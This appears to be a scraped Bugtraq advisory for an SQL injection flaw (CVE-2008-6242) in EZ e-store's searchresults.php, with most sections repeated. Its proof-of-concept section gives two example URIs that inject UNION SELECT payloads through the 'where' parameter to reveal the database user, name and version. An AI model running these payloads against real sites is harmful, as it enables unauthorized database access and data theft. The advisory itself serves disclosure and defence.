Scripts For Sites EZ e-store 'searchresults.php' SQL Injection Vulnerability
BID:32039
Info
Scripts For Sites EZ e-store 'searchresults.php' SQL Injection Vulnerability
| Bugtraq ID: | 32039 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6242 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 01 2008 12:00AM |
| Updated: | Apr 16 2015 05:52PM |
| Credit: | ZoRLu |
| Vulnerable: |
Scripts for Sites EZ e-store 0 getaphpsite.com E-Store 0 |
| Not Vulnerable: | |
Discussion
Scripts For Sites EZ e-store 'searchresults.php' SQL Injection Vulnerability
Scripts For Sites EZ e-store is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploits could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Scripts For Sites EZ e-store is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploits could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Scripts For Sites EZ e-store 'searchresults.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
http://www.example.com/path/SearchResults.php?SearchTerm=&where=ItemName UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23&ord1=ItemName&ord2=asc&search1=Go!
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
http://www.example.com/path/SearchResults.php?SearchTerm=&where=ItemName UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23&ord1=ItemName&ord2=asc&search1=Go!
Solution / Fix
Scripts For Sites EZ e-store 'searchresults.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Scripts For Sites EZ e-store 'searchresults.php' SQL Injection Vulnerability
References:
References:
- EZ e-store (Scripts for Sites)
- E-Store SQL Injection Vulnerability (Salvatore Fresta aka Drosophila
) - Re: E-Store SQL Injection Vulnerability (Packet Storm
) - SFS EZ Webstore (where) Remote SQL Injection Vulnerability (milw0rm)